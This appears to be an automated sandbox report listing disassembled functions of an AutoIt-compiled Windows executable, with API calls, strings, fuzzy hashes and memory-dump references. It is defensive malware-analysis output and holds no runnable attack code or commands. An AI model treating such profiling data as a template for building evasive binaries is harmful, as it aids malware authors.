Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 074f3e2f48fa603e46b1a40556422161c0f3e37995598984fc110e85652cb3c9
Instruction ID: ef8bc8b520f0e23bdb88faccb582105d7f5a1017b9b24be795ca78918b9b9ede
Opcode Fuzzy Hash: 074f3e2f48fa603e46b1a40556422161c0f3e37995598984fc110e85652cb3c9
Instruction Fuzzy Hash: FF51F471800109BADF14EBE1DD52EEEB778AF14749F10406BF40572291EB392F58DB6A

Function 004CB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004CB5FC
_wcslen.LIBCMT ref: 004CB608
_wcslen.LIBCMT ref: 004CB64D
_wcslen.LIBCMT ref: 004CB68C
_wcslen.LIBCMT ref: 004CB6C7

Strings

APPEND, xrefs: 004CB6C1, 004CB6C6
KEYS, xrefs: 004CB647, 004CB64C
REMOVE, xrefs: 004CB602, 004CB607
EXISTS, xrefs: 004CB686, 004CB68B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: d13f490a962ca70e9221f0ba07c6a92d5313ab6d985df8eb13590c1aefaac7a7
Instruction ID: cf39f31f15f31efa07c4f98c23e1083a1ab983d44c2ee51386315a814fa7bada
Opcode Fuzzy Hash: d13f490a962ca70e9221f0ba07c6a92d5313ab6d985df8eb13590c1aefaac7a7
Instruction Fuzzy Hash: 7841D236B000268ACB606E79C892ABF77A5EBA0758F24412FE465D7380E739CC81C7D5

Function 004D5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004D53A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004D5416
GetLastError.KERNEL32 ref: 004D5420
SetErrorMode.KERNEL32(00000000,READY), ref: 004D54A7

Strings

NOTREADY, xrefs: 004D544B
UNKNOWN, xrefs: 004D5444
READONLY, xrefs: 004D5452
INVALID, xrefs: 004D5459
READY, xrefs: 004D5460, 004D5468

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 0d4e7dc8d7f51ac5e70fcd4e9626c8f3593e8d0dab04fa72c02139203e5676a5
Instruction ID: 713db896727e0d0808d4407dd907feaa50c7095075fbe7fa143d10d161000e7b
Opcode Fuzzy Hash: 0d4e7dc8d7f51ac5e70fcd4e9626c8f3593e8d0dab04fa72c02139203e5676a5
Instruction Fuzzy Hash: BC31B235A005089FC710DF68D598BAA7BB4FF45309F14806BE405CB392EB78DD82CB96

Function 004F3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 004F3C79
SetMenu.USER32(?,00000000), ref: 004F3C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004F3D10
IsMenu.USER32(?), ref: 004F3D24
CreatePopupMenu.USER32 ref: 004F3D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004F3D5B
DrawMenuBar.USER32 ref: 004F3D63

Strings

0, xrefs: 004F3C54
F, xrefs: 004F3D4E

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 39b63fe322dc94f57153005e688b6ba0c0a497f35c41a7a010ee1516b9189055
Instruction ID: 12e62750ada2fcf455979d7dc388874199a36a2af8d9b58e2515ed486e5d2484
Opcode Fuzzy Hash: 39b63fe322dc94f57153005e688b6ba0c0a497f35c41a7a010ee1516b9189055
Instruction Fuzzy Hash: 89419A75A0120DEFDB14CF64D884BAA7BB5FF49341F14002AFA06A7360D734AA14CF98

Function 004F3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004F3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004F3AA0
GetWindowLongW.USER32(?,000000F0), ref: 004F3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004F3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004F3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 004F3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004F3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 004F3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 004F3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 004F3C13

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 85d7aaa0c945316f8c3ef3a90666d05e133aa0b9058c336aa7e1ec03d5739bb2
Instruction ID: 512926a6acc0eaff3b94ba8fd4640c89e4b9b39f8110d1e58158bf8c1f0b8bb8
Opcode Fuzzy Hash: 85d7aaa0c945316f8c3ef3a90666d05e133aa0b9058c336aa7e1ec03d5739bb2
Instruction Fuzzy Hash: E3616C75900248AFDB10DFA4CC81EFE77B8EB09704F10019AFA15A73A2D774AE45DB54

Function 004CB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004CB151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,004CA1E1,?,00000001), ref: 004CB165
GetWindowThreadProcessId.USER32(00000000), ref: 004CB16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004CA1E1,?,00000001), ref: 004CB17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 004CB18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004CA1E1,?,00000001), ref: 004CB1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004CA1E1,?,00000001), ref: 004CB1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004CA1E1,?,00000001), ref: 004CB1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004CA1E1,?,00000001), ref: 004CB212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004CA1E1,?,00000001), ref: 004CB21D

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 920bffde5d955fe3adcf25cae1faaf2ec6fb8b00358b011e789b7f8804c88cfa
Instruction ID: 64b6562a7f2b907f4d8521186637a223bf812a9b21a0cd711b6128c9e02e333c
Opcode Fuzzy Hash: 920bffde5d955fe3adcf25cae1faaf2ec6fb8b00358b011e789b7f8804c88cfa
Instruction Fuzzy Hash: B131B179100204AFEB209F64DD8DF7A7BA9EB20351F10405AF900C6390DB789D44CFA8

Function 00492C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00492C94

Part of subcall function 004929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0049D7D1,00000000,00000000,00000000,00000000,?,0049D7F8,00000000,00000007,00000000,?,0049DBF5,00000000), ref: 004929DE
Part of subcall function 004929C8: GetLastError.KERNEL32(00000000,?,0049D7D1,00000000,00000000,00000000,00000000,?,0049D7F8,00000000,00000007,00000000,?,0049DBF5,00000000,00000000), ref: 004929F0

_free.LIBCMT ref: 00492CA0
_free.LIBCMT ref: 00492CAB
_free.LIBCMT ref: 00492CB6
_free.LIBCMT ref: 00492CC1
_free.LIBCMT ref: 00492CCC
_free.LIBCMT ref: 00492CD7
_free.LIBCMT ref: 00492CE2
_free.LIBCMT ref: 00492CED
_free.LIBCMT ref: 00492CFB

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4d8806b5c2b120b2874520d3fdfaf54c3344f3527fedc6f36e270685274b669f
Instruction ID: c9124df839691ff277822e1d6399c67742c9919c1c27515fd93eecb741eff302
Opcode Fuzzy Hash: 4d8806b5c2b120b2874520d3fdfaf54c3344f3527fedc6f36e270685274b669f
Instruction Fuzzy Hash: FC1196B6200108BFCF02EF55DA42CDD3FA5FF05354F4144AAFA485B222D675EA509B94

Function 00461410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00461459
OleUninitialize.OLE32(?,00000000), ref: 004614F8
UnregisterHotKey.USER32(?), ref: 004616DD
DestroyWindow.USER32(?), ref: 004A24B9
FreeLibrary.KERNEL32(?), ref: 004A251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004A254B

Strings

close all, xrefs: 00461454

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: ee35d4d55223c749298e89e47c1e9c6c81661d45d1c74a6153f3c3ed8fe44589
Instruction ID: 0d8f7b87b655964e2800b6cba861b60b5d3676ebf0d306366b393d416472315f
Opcode Fuzzy Hash: ee35d4d55223c749298e89e47c1e9c6c81661d45d1c74a6153f3c3ed8fe44589
Instruction Fuzzy Hash: 59D1A130701212DFCB19EF19C695A29F7A0BF15304F18819FE44A6B361EB78AC16DF5A

Function 00465BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00465C7A

Part of subcall function 00465D0A: GetClientRect.USER32(?,?), ref: 00465D30
Part of subcall function 00465D0A: GetWindowRect.USER32(?,?), ref: 00465D71
Part of subcall function 00465D0A: ScreenToClient.USER32(?,?), ref: 00465D99

GetDC.USER32 ref: 004A46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004A4708
SelectObject.GDI32(00000000,00000000), ref: 004A4716
SelectObject.GDI32(00000000,00000000), ref: 004A472B
ReleaseDC.USER32(?,00000000), ref: 004A4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004A47C4

Strings

U, xrefs: 004A4693

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 5006bfcc425a8709ab8e9ed14228d5049bd6a3502ed16f9bc7f45ebc4dee68b9
Instruction ID: 06129a4f08eba5c7fb762e5d64c5c677412545c5c476f2d84506bd28821ed7af
Opcode Fuzzy Hash: 5006bfcc425a8709ab8e9ed14228d5049bd6a3502ed16f9bc7f45ebc4dee68b9
Instruction Fuzzy Hash: 94711235400209DFCF218F64C984ABE7BB1FFEB324F14426BE9515A2A6D7788842DF59

Function 004D359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004D35E4

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

LoadStringW.USER32(00532390,?,00000FFF,?), ref: 004D360A

Strings

"%s" (%d) : ==> %s:, xrefs: 004D3742
Error: , xrefs: 004D36EF
^ ERROR, xrefs: 004D36C9
Line %d (File "%s"):, xrefs: 004D366B
"%s" (%d) : ==> %s:%s%s, xrefs: 004D3724

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: c1151eda2c0742286ac54ac24d7668e731d0a12ec58cbe2ac4bbd8dc55d9be62
Instruction ID: dd620e7c11a05ed4f635bfc96bca4734335af7b8ccfa540438c6be2af5ac98e1
Opcode Fuzzy Hash: c1151eda2c0742286ac54ac24d7668e731d0a12ec58cbe2ac4bbd8dc55d9be62
Instruction Fuzzy Hash: 3E51A271800509BADF14EFA1CD41EEEBB38AF14305F14412BF50572291EB781E98DF6A

Function 004DC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004DC272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004DC29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004DC2CA
GetLastError.KERNEL32 ref: 004DC322
SetEvent.KERNEL32(?), ref: 004DC336
InternetCloseHandle.WININET(00000000), ref: 004DC341

Strings

, xrefs: 004DC2BB

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 71c044d9692cd7326171a457b74c89d4f6d2cecc7d9d92fea43a684d2a241f5c
Instruction ID: 0bb8b19d98e29a32b23d12632eaed5751c3e0868658cca34404e1eb673c2cb3e
Opcode Fuzzy Hash: 71c044d9692cd7326171a457b74c89d4f6d2cecc7d9d92fea43a684d2a241f5c
Instruction Fuzzy Hash: 79316FB1600209AFDB219F6589D4ABB7BFCEB49744B10852FF84692300DB38DD05DB69

Function 004C989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004A3AAF,?,?,Bad directive syntax error,004FCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 004C98BC
LoadStringW.USER32(00000000,?,004A3AAF,?), ref: 004C98C3

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004C9987

Strings

Line %d:, xrefs: 004C9912
., xrefs: 004C996D
%s (%d) : ==> %s.: %s %s, xrefs: 004C98F1
Line %d (File "%s"):, xrefs: 004C992D
Error: , xrefs: 004C9955

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 7efeebe3f3b93f88074f44d7813b38d44a96a17135b2e7e5c612786f16817143
Instruction ID: f1a4c87ac2d19fd5fb0ee8ebab37359ff01e03ded9b959c7590702091ece9974
Opcode Fuzzy Hash: 7efeebe3f3b93f88074f44d7813b38d44a96a17135b2e7e5c612786f16817143
Instruction Fuzzy Hash: 6921A27180025EBBCF11AF90CC4AEFE7739BF18704F04442EF515621A1EB79AA68DB55

Function 004C209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 004C20AB
GetClassNameW.USER32(00000000,?,00000100), ref: 004C20C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004C214D

Strings

largeicons, xrefs: 004C20E1
smallicons, xrefs: 004C2115
list, xrefs: 004C212F
SHELLDLL_DefView, xrefs: 004C20CC
details, xrefs: 004C20FB

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 6604f9f33cd7f9ee7b7f8eecdabe6c2ac4111488c46d0a42e646d4b61ad263c2
Instruction ID: 20cb3b6c74ecd73240f14df3054e7899bf9269e5f4f921aa49806ec74a149da8
Opcode Fuzzy Hash: 6604f9f33cd7f9ee7b7f8eecdabe6c2ac4111488c46d0a42e646d4b61ad263c2
Instruction Fuzzy Hash: 0111E77E688717B9F6052621AD06EBB379CDF05324B20002FF705A51D1FEF958125A1C

Function 0049CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0049CEB7
_free.LIBCMT ref: 0049CF22
_free.LIBCMT ref: 0049CF48
_free.LIBCMT ref: 0049CF71
_free.LIBCMT ref: 0049CFA9
_free.LIBCMT ref: 0049CFDA
_free.LIBCMT ref: 0049D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0049D09C
_free.LIBCMT ref: 0049D0B5

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: ce0f4987150b8243914aab9c47655dbb7d9854d9987f51a8bdee21e5244ad3c6
Instruction ID: ac3a5992d7f17d1913fc6e49a36ad1007ed9e6419e871fa5469265fa3db0c2a2
Opcode Fuzzy Hash: ce0f4987150b8243914aab9c47655dbb7d9854d9987f51a8bdee21e5244ad3c6
Instruction Fuzzy Hash: 946154B1A04300AFDF21AFB598D1A6A7FA5AF05358F04057FF805973C6D63D9D018798

Function 004F50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 004F5186
ShowWindow.USER32(?,00000000), ref: 004F51C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 004F51CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 004F51D1

Part of subcall function 004F6FBA: DeleteObject.GDI32(00000000), ref: 004F6FE6

GetWindowLongW.USER32(?,000000F0), ref: 004F520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004F521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004F524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 004F5287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 004F5296

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 3c01c86957fcf64d0c06fa707db360d46c60f48e6db961f80d0d18581bd5fddb
Instruction ID: c8259ae3a6d8fdd91d6c9a28f92a99094c6605eab1e3a6723e6774a62891177e
Opcode Fuzzy Hash: 3c01c86957fcf64d0c06fa707db360d46c60f48e6db961f80d0d18581bd5fddb
Instruction Fuzzy Hash: 7B518C30A40A0CBEEF209F25CD4ABFA3B65EB05325F148257F715962E0C379A990DF49

Function 00478B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 004B6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004B68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004B68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 004B68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004B68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00478874,00000000,00000000,00000000,000000FF,00000000), ref: 004B6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 004B691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00478874,00000000,00000000,00000000,000000FF,00000000), ref: 004B692D

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

